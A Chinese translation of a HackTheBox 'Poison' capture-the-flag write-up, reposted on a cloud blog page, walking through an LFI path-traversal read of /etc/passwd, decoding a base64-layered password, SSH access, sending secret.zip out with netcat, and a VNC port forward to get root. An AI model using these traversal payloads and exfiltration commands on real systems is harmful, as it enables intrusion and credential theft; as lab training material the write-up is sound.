HackTheBox - Poison Writeup

来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

PoisionHackTheBox里面非常简单的一个CTF服务器,不过它确实包含了一些让有趣且独特东西。

初始

网络枚举

让我们依旧使用nmap进行快速扫描。

root@kali:~# nmap -sV 10.10.10.84

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT

Nmap scan report for 10.10.10.84

Host is up (0.052s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

在浏览器中查看端口80的页面。

我们可以在Scriptname字段中依次检查这些文件名。当我们提交listfiles.php时,页面输出了以下内容:

请注意URL的形式,它调用这些文件的方式可能容易受到LFI的攻击。

我们先来看看pwdbackup.txt,因为这个文件看起来很有趣。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU

bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS

bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW

M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs

WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy

eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G

WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw

MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa

T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k

WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk

WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0

NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT

Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz

WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW

VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO

Ukd4RVdub3dPVU5uUFQwSwo=

编码了13次,好吧,让我们快速编写一个python脚本来快速解码,而不是手动一次次执行解码。

import base64

string **=**"""

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU

bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS

bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW

M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs

WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy

eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G

WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw

MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa

T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k

WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk

WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0

NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT

Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz

WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW

VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO

Ukd4RVdub3dPVU5uUFQwSwo= """

**def**** decode**(b64\_string, iterations):

    i **=** 0

    **while** i **\<** iterations:

        b64\_string **=** base64 **.** b64decode(b64\_string) **.** decode('utf-8')

        i **+=** 1

    **print** (b64\_string)

decode(string, 13)

测试脚本并运行:

root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0

OK!我们得到了密码,但我们仍然需要知道用户名。 让我们测试一下是否存在LFI漏洞。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd

\<br /\>
\<b\>Warning\</b\>:  include(../../../etc/passwd): failed to open stream: No such file or directory in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>
\<br /\>
\<b\>Warning\</b\>:  include(): Failed opening '../../../etc/passwd' for inclusion (include\_path='.:/usr/local/www/apache24/data') in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>

我们在这里可以看到确实使用了include(),我们也看到了包含的路径,所以我们需要跳五层目录才能跳到根目录。

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:\*:0:0:Charlie &:/root:/bin/csh
toor:\*:0:0:Bourne-again Superuser:/root:
daemon:\*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:\*:2:5:System &:/:/usr/sbin/nologin
bin:\*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:\*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:\*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:\*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:\*:8:8:News Subsystem:/:/usr/sbin/nologin
man:\*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:\*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:\*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:\*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:\*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:\*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:\*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
\_pflogd:\*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
\_dhcp:\*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:\*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:\*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:\*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:\*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
\_ypldap:\*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:\*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:\*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
\_tss:\*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:\*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:\*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:\*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:\*:1001:1001:charix:/home/charix:/bin/csh

我们看到有一个charix的用户名。 让我们用这个用户名和密码试试ssh

root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
        http://www.FreeBSD.org/search/search.html
charix@Poison:~ %

很好!

特权升级

查看主目录,我们看到一个可疑的zip文件。

charix@Poison:~ % ls -al
total 48
drwxr-x---  2 charix  charix   512 Mar 19 17:16 .
drwxr-xr-x  3 root    wheel    512 Mar 19 16:08 ..
-rw-r-----  1 charix  charix  1041 Mar 19 17:16 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19 17:17 .history
-rw-r-----  1 charix  charix   254 Mar 19 16:08 .login
-rw-r-----  1 charix  charix   163 Mar 19 16:08 .login\_conf
-rw-r-----  1 charix  charix   379 Mar 19 16:08 .mail\_aliases
-rw-r-----  1 charix  charix   336 Mar 19 16:08 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19 16:08 .profile
-rw-r-----  1 charix  charix   281 Mar 19 16:08 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19 16:08 .shrc
-rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
-rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt

让我们用netcat将这个zip文件传到我们的本地机器上。

charix@Poison:~ % nc -w 2 10.10.14.8 443 \< secret.zip
root@kali:~/htb/poison# nc -lvnp 443 \> secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787

这个zip文件受密码保护,但我们可以尝试使用charix用户的ssh密码来解压缩。竟然可以!

root@kali:~/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

检查文件格式,我们可以看到它应该是一个常规的ASCII文件。

root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!

然而,文件内容是一些垃圾字符。 让我们再仔细了解一下这台服务器吧。 使用ps aux检查运行的进程后,我们看到以下几个有趣的内容。

root    529   0.0  0.9  23620  8996 v0- I    19:17     0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root    540   0.0  0.7  67220  7060 v0- I    19:17     0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop

我们还看到一些监听在本地的端口。

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           \*.\*                    LISTEN
tcp4       0      0 \*.80                   \*.\*                    LISTEN
tcp6       0      0 \*.80                   \*.\*                    LISTEN
tcp4       0      0 \*.22                   \*.\*                    LISTEN
tcp6       0      0 \*.22                   \*.\*                    LISTEN
tcp4       0      0 127.0.0.1.5801         \*.\*                    LISTEN
tcp4       0      0 127.0.0.1.5901         \*.\*                    LISTEN
udp4       0      0 \*.514                  \*.\*
udp6       0      0 \*.514                  \*.\*

端口5801和5901通常是VNC服务使用,这与我们在进程列表中看到的正在运行的VNC会话相匹配。让我们把端口转发到我们的本地机器上,这样我们就可以访问了(确保你在本地机器上已经启动了SSH!)。

charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/\*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#

如果我们检查kali上的监听连接,我们会看到端口转发已经成功。

root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:\*               LISTEN
tcp        0      0 127.0.0.1:5801          0.0.0.0:\*               LISTEN
tcp        0      0 10.10.14.8:44976        10.10.10.84:22          ESTABLISHED
tcp        0      0 10.10.14.8:22           10.10.10.84:54672       ESTABLISHED
tcp6       0      0 :::22                   :::\*                    LISTEN
tcp6       0      0 ::1:5801                :::\*                    LISTEN

Vncviewer 支持-passwd选项,所以我们可以将passwd文件传递给它来进行身份验证,因此我们可能会传递我们之前拿到的那个secret文件进行身份验证。

root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [\<OPTIONS\>] [\<HOST\>][:\<DISPLAY#\>]
       vncviewer [\<OPTIONS\>] [\<HOST\>][::\<PORT#\>]
       vncviewer [\<OPTIONS\>] -listen [\<DISPLAY#\>]
       vncviewer -help
\<OPTIONS\> are standard Xt options, or:
        -via \<GATEWAY\>
        -shared (set by default)
        -noshared
        -viewonly
        -fullscreen
        -noraiseonbeep
        -passwd \<PASSWD-FILENAME\> (standard VNC authentication)
~

~

root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801

Connected to RFB server, using protocol version 3.8

Enabling TightVNC protocol extensions

Performing standard VNC authentication

Authentication successful

Desktop name "root's X desktop (Poison:1)"

没错,搞定了!

本文分享自微信公众号 - 安恒网络空间安全讲武堂(cyberslab)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-11-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 2018“安恒杯”Web安全测试大赛(秋季预选赛)

    一键payload用第二个打第一个 sudo curl-v http://114.55.36.69:8004/ -H "Cookie: PHPSESSID=qp...

    安恒网络空间安全讲武堂
  • [HCTF] admin出题人求挨打

    HCTF2018-web-admin来自出题人的write up

    安恒网络空间安全讲武堂
  • hackme.inndy.tw的19道web题解(上)

    目录 写在前面... hide and seek. guestbook. LFI .homepage. ping. scoreboard. log...

    安恒网络空间安全讲武堂
  • CVE-2019-19781 Citrix ADC 远程代码执行漏洞复现

    #### https://www.citrix.com/downloads/citrix-gateway/

    用户5878089
  • Android Studio集成Bug管理系统

    用户1907613
  • discuz 表结构

    discuz 主题表pre_forum_thread 注解 tid mediumint(8) unsigned NOT NULL auto_increment ...

    joshua317
  • PNAS:与语言相关的脑网络中特定频率的有向连接

    请点击上面“思影科技”四个字,选择关注我们,思影科技专注于脑影像数据处理,涵盖(fMRI,结构像,DTI,ASL,EEG/ERP,FNIRS,眼动)等,希望专业...

    用户1279583
  • 博弈论入门之巴什博奕

    巴什博奕 巴什博奕: 两个顶尖聪明的人在玩游戏,有n个石子,每人可以随便拿1-m个石子,不能拿的人为败者,问谁会胜利 巴什博奕是博弈论问题中基础的问...

    attack
  • 服务端持续集成实战

    基于Jenkins的服务端持续集成已在搜狗商业产品系统实现,实施流程如下图,今天介绍如何在服务端实施持续集成。

    用户5521279
  • Django后台管理界面修改(源文件修改)

    治电小白菜

扫码关注云+社区

领取腾讯云代金券